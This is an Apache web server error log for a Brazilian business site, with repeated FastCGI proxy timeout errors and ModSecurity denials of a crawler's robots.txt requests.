[Sun Mar 15 21:46:46.061796 2026] [proxy_fcgi:error] [pid 21533:tid 140411691570944] (70007)The timeout specified has expired: [client 179.188.53.243:55120] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 21:47:10.061823 2026] [proxy_fcgi:error] [pid 11972:tid 140411716749056] (70007)The timeout specified has expired: [client 179.188.53.243:55270] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 21:47:32.033861 2026] [proxy_fcgi:error] [pid 21805:tid 140411674785536] (70007)The timeout specified has expired: [client 179.188.53.243:55382] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 21:47:53.061842 2026] [proxy_fcgi:error] [pid 21806:tid 140411658000128] (70007)The timeout specified has expired: [client 179.188.53.243:55628] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 21:48:14.128018 2026] [proxy_fcgi:error] [pid 32654:tid 140411632822016] (70007)The timeout specified has expired: [client 179.188.53.243:55778] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 21:48:28.823412 2026] [:error] [pid 21806:tid 140411733534464] [client 74.7.244.31:42212] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abdTXNSswJuvopo3lOglFwAAAIE"]
[Sun Mar 15 21:48:35.129843 2026] [proxy_fcgi:error] [pid 21533:tid 140411590858496] (70007)The timeout specified has expired: [client 179.188.53.243:55868] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 21:48:56.121826 2026] [proxy_fcgi:error] [pid 11972:tid 140411658000128] (70007)The timeout specified has expired: [client 179.188.53.243:56002] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 21:48:58.097132 2026] [:error] [pid 32654:tid 140411716749056] [client 74.7.228.16:48292] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abdTeglT9VtDQc7bgUxV5QAAAQM"]
[Sun Mar 15 21:49:17.033818 2026] [proxy_fcgi:error] [pid 21806:tid 140411540502272] (70007)The timeout specified has expired: [client 179.188.53.243:56138] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 21:49:38.134731 2026] [proxy_fcgi:error] [pid 21946:tid 140411582465792] (70007)The timeout specified has expired: [client 179.188.53.243:56312] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 21:49:59.069788 2026] [proxy_fcgi:error] [pid 21533:tid 140411741927168] (70007)The timeout specified has expired: [client 179.188.53.243:56420] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 21:50:21.124177 2026] [proxy_fcgi:error] [pid 11972:tid 140411725141760] (70007)The timeout specified has expired: [client 179.188.53.243:56566] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 21:50:43.097936 2026] [proxy_fcgi:error] [pid 21533:tid 140411574073088] (70007)The timeout specified has expired: [client 179.188.53.243:56788] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 21:51:04.129792 2026] [proxy_fcgi:error] [pid 11972:tid 140411632822016] (70007)The timeout specified has expired: [client 179.188.53.243:57006] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 21:51:25.069862 2026] [proxy_fcgi:error] [pid 21533:tid 140411699963648] (70007)The timeout specified has expired: [client 179.188.53.243:57132] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 21:51:46.037820 2026] [proxy_fcgi:error] [pid 21805:tid 140411616036608] (70007)The timeout specified has expired: [client 179.188.53.243:57274] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 21:52:07.125802 2026] [proxy_fcgi:error] [pid 21533:tid 140411641214720] (70007)The timeout specified has expired: [client 179.188.53.243:57416] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 21:52:33.057888 2026] [proxy_fcgi:error] [pid 11972:tid 140411691570944] (70007)The timeout specified has expired: [client 179.188.53.243:57628] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 21:52:54.126481 2026] [proxy_fcgi:error] [pid 21533:tid 140411649607424] (70007)The timeout specified has expired: [client 179.188.53.243:57778] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 21:53:15.130288 2026] [proxy_fcgi:error] [pid 21533:tid 140411582465792] (70007)The timeout specified has expired: [client 179.188.53.243:57906] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 21:53:36.125809 2026] [proxy_fcgi:error] [pid 32654:tid 140411616036608] (70007)The timeout specified has expired: [client 179.188.53.243:58048] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 21:53:41.051866 2026] [:error] [pid 21946:tid 140411548894976] [client 74.7.244.31:52814] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abdUlXbQATo66fKoS7wJvAAAANc"]
[Sun Mar 15 21:53:57.129808 2026] [proxy_fcgi:error] [pid 21805:tid 140411590858496] (70007)The timeout specified has expired: [client 179.188.53.243:58278] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 21:54:06.874859 2026] [:error] [pid 21533:tid 140411607643904] [client 74.7.228.16:33696] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abdUrnjZBu2q05ozVU8UJAAAAVA"]
[Sun Mar 15 21:54:18.121979 2026] [proxy_fcgi:error] [pid 21533:tid 140411624429312] (70007)The timeout specified has expired: [client 179.188.53.243:58526] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 21:54:39.094924 2026] [proxy_fcgi:error] [pid 32654:tid 140411632822016] (70007)The timeout specified has expired: [client 179.188.53.243:58680] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 21:55:00.083352 2026] [proxy_fcgi:error] [pid 11972:tid 140411548894976] (70007)The timeout specified has expired: [client 179.188.53.243:58802] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 21:55:22.069814 2026] [proxy_fcgi:error] [pid 32654:tid 140411557287680] (70007)The timeout specified has expired: [client 179.188.53.243:58942] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 21:55:43.084669 2026] [proxy_fcgi:error] [pid 21946:tid 140411725141760] (70007)The timeout specified has expired: [client 179.188.53.243:59064] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 21:56:07.117777 2026] [proxy_fcgi:error] [pid 11972:tid 140411649607424] (70007)The timeout specified has expired: [client 179.188.53.243:59184] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 21:56:28.122026 2026] [proxy_fcgi:error] [pid 21805:tid 140411691570944] (70007)The timeout specified has expired: [client 179.188.53.243:59392] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 21:56:49.122328 2026] [proxy_fcgi:error] [pid 11972:tid 140411658000128] (70007)The timeout specified has expired: [client 179.188.53.243:59528] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 21:57:11.501952 2026] [proxy_fcgi:error] [pid 32654:tid 140411599251200] (70007)The timeout specified has expired: [client 179.188.53.243:59642] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 21:57:33.120765 2026] [proxy_fcgi:error] [pid 21946:tid 140411674785536] (70007)The timeout specified has expired: [client 179.188.53.243:59770] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 21:57:55.069910 2026] [proxy_fcgi:error] [pid 21805:tid 140411607643904] (70007)The timeout specified has expired: [client 179.188.53.243:59886] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 21:58:16.119760 2026] [proxy_fcgi:error] [pid 11972:tid 140411590858496] (70007)The timeout specified has expired: [client 179.188.53.243:60002] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 21:58:38.061865 2026] [proxy_fcgi:error] [pid 21533:tid 140411590858496] (70007)The timeout specified has expired: [client 179.188.53.243:60126] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 21:58:59.125808 2026] [proxy_fcgi:error] [pid 21806:tid 140411666392832] (70007)The timeout specified has expired: [client 179.188.53.243:60240] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 21:59:04.098285 2026] [:error] [pid 11972:tid 140411658000128] [client 74.7.244.31:47754] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abdV2Jqj1wV0Si-OkeemNQAAAAo"]
[Sun Mar 15 21:59:20.129803 2026] [proxy_fcgi:error] [pid 21806:tid 140411557287680] (70007)The timeout specified has expired: [client 179.188.53.243:60342] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 21:59:31.058625 2026] [:error] [pid 21806:tid 140411540502272] [client 74.7.228.16:59608] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abdV89SswJuvopo3lOglvQAAAJg"]
[Sun Mar 15 21:59:41.121990 2026] [proxy_fcgi:error] [pid 11972:tid 140411716749056] (70007)The timeout specified has expired: [client 179.188.53.243:60432] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 22:00:02.230456 2026] [proxy_fcgi:error] [pid 21805:tid 140411741927168] (70007)The timeout specified has expired: [client 179.188.53.243:60574] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 22:00:23.153814 2026] [proxy_fcgi:error] [pid 21806:tid 140411699963648] (70007)The timeout specified has expired: [client 179.188.53.243:60756] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 22:00:45.129832 2026] [proxy_fcgi:error] [pid 21946:tid 140411716749056] (70007)The timeout specified has expired: [client 179.188.53.243:60866] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 22:01:06.125776 2026] [proxy_fcgi:error] [pid 11972:tid 140411624429312] (70007)The timeout specified has expired: [client 179.188.53.243:60958] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 22:01:29.065899 2026] [proxy_fcgi:error] [pid 21805:tid 140411674785536] (70007)The timeout specified has expired: [client 179.188.53.243:32922] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 22:01:50.137810 2026] [proxy_fcgi:error] [pid 11972:tid 140411574073088] (70007)The timeout specified has expired: [client 179.188.53.243:33072] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 22:02:11.133809 2026] [proxy_fcgi:error] [pid 21805:tid 140411599251200] (70007)The timeout specified has expired: [client 179.188.53.243:33174] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 22:02:33.117837 2026] [proxy_fcgi:error] [pid 21806:tid 140411565680384] (70007)The timeout specified has expired: [client 179.188.53.243:33296] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 22:02:55.125770 2026] [proxy_fcgi:error] [pid 21533:tid 140411565680384] (70007)The timeout specified has expired: [client 179.188.53.243:33454] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 22:03:17.121937 2026] [proxy_fcgi:error] [pid 21946:tid 140411725141760] (70007)The timeout specified has expired: [client 179.188.53.243:33602] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 22:03:38.124058 2026] [proxy_fcgi:error] [pid 32654:tid 140411674785536] (70007)The timeout specified has expired: [client 179.188.53.243:33734] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 22:03:59.133804 2026] [proxy_fcgi:error] [pid 21946:tid 140411699963648] (70007)The timeout specified has expired: [client 179.188.53.243:33860] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 22:04:04.515158 2026] [:error] [pid 21533:tid 140411574073088] [client 74.7.244.31:35206] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abdXBHjZBu2q05ozVU8UzwAAAVQ"]
[Sun Mar 15 22:04:21.045877 2026] [proxy_fcgi:error] [pid 32654:tid 140411683178240] (70007)The timeout specified has expired: [client 179.188.53.243:33980] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 22:04:42.043748 2026] [:error] [pid 21946:tid 140411565680384] [client 74.7.228.16:56674] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abdXKXbQATo66fKoS7wKvgAAANU"]
[Sun Mar 15 22:04:44.141832 2026] [proxy_fcgi:error] [pid 21533:tid 140411582465792] (70007)The timeout specified has expired: [client 179.188.53.243:34116] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 22:05:05.079855 2026] [proxy_fcgi:error] [pid 21805:tid 140411641214720] (70007)The timeout specified has expired: [client 179.188.53.243:34284] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 22:05:26.102687 2026] [proxy_fcgi:error] [pid 21805:tid 140411616036608] (70007)The timeout specified has expired: [client 179.188.53.243:34552] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 22:05:47.085802 2026] [proxy_fcgi:error] [pid 21806:tid 140411574073088] (70007)The timeout specified has expired: [client 179.188.53.243:34726] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 22:06:09.085826 2026] [proxy_fcgi:error] [pid 32654:tid 140411741927168] (70007)The timeout specified has expired: [client 179.188.53.243:34892] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 22:06:30.041869 2026] [proxy_fcgi:error] [pid 11972:tid 140411658000128] (70007)The timeout specified has expired: [client 179.188.53.243:35064] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 22:06:51.129810 2026] [proxy_fcgi:error] [pid 11972:tid 140411607643904] (70007)The timeout specified has expired: [client 179.188.53.243:35236] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 22:07:12.129795 2026] [proxy_fcgi:error] [pid 21533:tid 140411725141760] (70007)The timeout specified has expired: [client 179.188.53.243:35396] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 22:07:33.089963 2026] [proxy_fcgi:error] [pid 11972:tid 140411641214720] (70007)The timeout specified has expired: [client 179.188.53.243:35574] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 22:07:55.139102 2026] [proxy_fcgi:error] [pid 21806:tid 140411624429312] (70007)The timeout specified has expired: [client 179.188.53.243:35798] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 22:08:16.134518 2026] [proxy_fcgi:error] [pid 21806:tid 140411540502272] (70007)The timeout specified has expired: [client 179.188.53.243:36020] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 22:08:39.129794 2026] [proxy_fcgi:error] [pid 32654:tid 140411540502272] (70007)The timeout specified has expired: [client 179.188.53.243:36206] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 22:09:00.141851 2026] [proxy_fcgi:error] [pid 21805:tid 140411632822016] (70007)The timeout specified has expired: [client 179.188.53.243:36382] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 22:09:21.057952 2026] [proxy_fcgi:error] [pid 21946:tid 140411557287680] (70007)The timeout specified has expired: [client 179.188.53.243:36566] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 22:09:42.126350 2026] [proxy_fcgi:error] [pid 21806:tid 140411582465792] (70007)The timeout specified has expired: [client 179.188.53.243:36754] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 22:10:04.069855 2026] [proxy_fcgi:error] [pid 21805:tid 140411624429312] (70007)The timeout specified has expired: [client 179.188.53.243:36964] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 22:10:04.338890 2026] [:error] [pid 21533:tid 140411649607424] [client 74.7.228.16:49136] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abdYbHjZBu2q05ozVU8VZQAAAUs"]
[Sun Mar 15 22:10:28.112796 2026] [proxy_fcgi:error] [pid 21806:tid 140411666392832] (70007)The timeout specified has expired: [client 179.188.53.243:37236] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 22:10:49.137864 2026] [proxy_fcgi:error] [pid 11972:tid 140411741927168] (70007)The timeout specified has expired: [client 179.188.53.243:37388] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 22:11:10.114057 2026] [proxy_fcgi:error] [pid 32654:tid 140411708356352] (70007)The timeout specified has expired: [client 179.188.53.243:37616] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 22:11:32.135090 2026] [proxy_fcgi:error] [pid 21946:tid 140411699963648] (70007)The timeout specified has expired: [client 179.188.53.243:37820] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 22:11:53.065797 2026] [proxy_fcgi:error] [pid 32654:tid 140411590858496] (70007)The timeout specified has expired: [client 179.188.53.243:38024] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 22:12:14.130935 2026] [proxy_fcgi:error] [pid 21533:tid 140411565680384] (70007)The timeout specified has expired: [client 179.188.53.243:38284] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 22:12:35.042344 2026] [proxy_fcgi:error] [pid 21805:tid 140411699963648] (70007)The timeout specified has expired: [client 179.188.53.243:38464] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 22:12:56.149806 2026] [proxy_fcgi:error] [pid 21533:tid 140411548894976] (70007)The timeout specified has expired: [client 179.188.53.243:38682] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 22:13:17.125783 2026] [proxy_fcgi:error] [pid 21946:tid 140411574073088] (70007)The timeout specified has expired: [client 179.188.53.243:38862] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 22:13:39.126893 2026] [proxy_fcgi:error] [pid 21805:tid 140411691570944] (70007)The timeout specified has expired: [client 179.188.53.243:39092] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 22:14:02.114874 2026] [proxy_fcgi:error] [pid 32654:tid 140411649607424] (70007)The timeout specified has expired: [client 179.188.53.243:39262] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 22:14:23.133782 2026] [proxy_fcgi:error] [pid 21533:tid 140411582465792] (70007)The timeout specified has expired: [client 179.188.53.243:39406] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 22:14:34.435276 2026] [:error] [pid 21805:tid 140411725141760] [client 74.7.244.31:37162] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abdZerABkC4fWIHEf8GsfQAAAEI"]
[Sun Mar 15 22:14:44.129817 2026] [proxy_fcgi:error] [pid 32654:tid 140411607643904] (70007)The timeout specified has expired: [client 179.188.53.243:39574] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 22:15:05.125803 2026] [proxy_fcgi:error] [pid 21806:tid 140411641214720] (70007)The timeout specified has expired: [client 179.188.53.243:39804] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 22:15:15.488240 2026] [:error] [pid 21806:tid 140411725141760] [client 74.7.228.16:53904] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abdZo9SswJuvopo3lOgm4AAAAII"]
[Sun Mar 15 22:15:27.129849 2026] [proxy_fcgi:error] [pid 21805:tid 140411540502272] (70007)The timeout specified has expired: [client 179.188.53.243:40020] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 22:15:51.142267 2026] [proxy_fcgi:error] [pid 32654:tid 140411674785536] (70007)The timeout specified has expired: [client 179.188.53.243:40208] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 22:16:12.122956 2026] [proxy_fcgi:error] [pid 11972:tid 140411582465792] (70007)The timeout specified has expired: [client 179.188.53.243:40356] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 22:16:33.069924 2026] [proxy_fcgi:error] [pid 32654:tid 140411557287680] (70007)The timeout specified has expired: [client 179.188.53.243:40492] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 22:16:55.828524 2026] [proxy_fcgi:error] [pid 21946:tid 140411616036608] (70007)The timeout specified has expired: [client 179.188.53.243:40720] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 22:17:17.122058 2026] [proxy_fcgi:error] [pid 11972:tid 140411632822016] (70007)The timeout specified has expired: [client 179.188.53.243:40864] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 22:17:38.129928 2026] [proxy_fcgi:error] [pid 21946:tid 140411708356352] (70007)The timeout specified has expired: [client 179.188.53.243:41022] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 22:17:59.121881 2026] [proxy_fcgi:error] [pid 11972:tid 140411691570944] (70007)The timeout specified has expired: [client 179.188.53.243:41130] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 22:18:20.553801 2026] [proxy_fcgi:error] [pid 21805:tid 140411708356352] (70007)The timeout specified has expired: [client 179.188.53.243:41336] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 22:18:42.121770 2026] [proxy_fcgi:error] [pid 21805:tid 140411674785536] (70007)The timeout specified has expired: [client 179.188.53.243:41498] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 22:19:04.121814 2026] [proxy_fcgi:error] [pid 11972:tid 140411641214720] (70007)The timeout specified has expired: [client 179.188.53.243:41624] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 22:19:26.125797 2026] [proxy_fcgi:error] [pid 11972:tid 140411624429312] (70007)The timeout specified has expired: [client 179.188.53.243:41754] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 22:19:47.957874 2026] [proxy_fcgi:error] [pid 21806:tid 140411683178240] (70007)The timeout specified has expired: [client 179.188.53.243:41946] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 22:19:58.604804 2026] [:error] [pid 21806:tid 140411574073088] [client 74.7.244.31:34364] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abdavtSswJuvopo3lOgnSQAAAJQ"]
[Sun Mar 15 22:20:09.069865 2026] [proxy_fcgi:error] [pid 11972:tid 140411658000128] (70007)The timeout specified has expired: [client 179.188.53.243:42132] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 22:20:30.121847 2026] [proxy_fcgi:error] [pid 21946:tid 140411699963648] (70007)The timeout specified has expired: [client 179.188.53.243:42272] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 22:20:36.072850 2026] [:error] [pid 21805:tid 140411658000128] [client 74.7.228.16:52610] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abda5LABkC4fWIHEf8GtDgAAAEo"]
[Sun Mar 15 22:20:51.145827 2026] [proxy_fcgi:error] [pid 21946:tid 140411590858496] (70007)The timeout specified has expired: [client 179.188.53.243:42446] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 22:21:13.127293 2026] [proxy_fcgi:error] [pid 21533:tid 140411649607424] (70007)The timeout specified has expired: [client 179.188.53.243:42654] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 22:21:34.129820 2026] [proxy_fcgi:error] [pid 21806:tid 140411548894976] (70007)The timeout specified has expired: [client 179.188.53.243:42858] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 22:21:55.113913 2026] [proxy_fcgi:error] [pid 21805:tid 140411691570944] (70007)The timeout specified has expired: [client 179.188.53.243:42992] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 22:22:17.041939 2026] [proxy_fcgi:error] [pid 21946:tid 140411741927168] (70007)The timeout specified has expired: [client 179.188.53.243:43138] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 22:22:38.137831 2026] [proxy_fcgi:error] [pid 21533:tid 140411725141760] (70007)The timeout specified has expired: [client 179.188.53.243:43276] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 22:22:59.133833 2026] [proxy_fcgi:error] [pid 21805:tid 140411725141760] (70007)The timeout specified has expired: [client 179.188.53.243:43444] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 22:23:20.133760 2026] [proxy_fcgi:error] [pid 21946:tid 140411632822016] (70007)The timeout specified has expired: [client 179.188.53.243:43578] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 22:23:41.133810 2026] [proxy_fcgi:error] [pid 11972:tid 140411699963648] (70007)The timeout specified has expired: [client 179.188.53.243:43752] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 22:24:03.133777 2026] [proxy_fcgi:error] [pid 21533:tid 140411674785536] (70007)The timeout specified has expired: [client 179.188.53.243:44064] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 22:24:26.123536 2026] [proxy_fcgi:error] [pid 32654:tid 140411733534464] (70007)The timeout specified has expired: [client 179.188.53.243:44300] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 22:24:47.025844 2026] [proxy_fcgi:error] [pid 21805:tid 140411540502272] (70007)The timeout specified has expired: [client 179.188.53.243:44434] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 22:25:08.126470 2026] [proxy_fcgi:error] [pid 32654:tid 140411599251200] (70007)The timeout specified has expired: [client 179.188.53.243:44580] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 22:25:19.007229 2026] [:error] [pid 21806:tid 140411716749056] [client 74.7.244.31:33686] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abdb_9SswJuvopo3lOgnpwAAAIM"]
[Sun Mar 15 22:25:31.517805 2026] [proxy_fcgi:error] [pid 21806:tid 140411674785536] (70007)The timeout specified has expired: [client 179.188.53.243:44756] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 22:25:49.799376 2026] [:error] [pid 32654:tid 140411691570944] [client 74.7.228.16:55056] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abdcHQlT9VtDQc7bgUxZEAAAAQY"]
[Sun Mar 15 22:25:53.137806 2026] [proxy_fcgi:error] [pid 11972:tid 140411691570944] (70007)The timeout specified has expired: [client 179.188.53.243:44964] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 22:26:14.125806 2026] [proxy_fcgi:error] [pid 21805:tid 140411741927168] (70007)The timeout specified has expired: [client 179.188.53.243:45078] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 22:26:36.137939 2026] [proxy_fcgi:error] [pid 21806:tid 140411666392832] (70007)The timeout specified has expired: [client 179.188.53.243:45282] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 22:26:57.129856 2026] [proxy_fcgi:error] [pid 21946:tid 140411565680384] (70007)The timeout specified has expired: [client 179.188.53.243:45512] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 22:27:18.130463 2026] [proxy_fcgi:error] [pid 21806:tid 140411574073088] (70007)The timeout specified has expired: [client 179.188.53.243:45628] AH01075: Error dispatching request to : (polling)
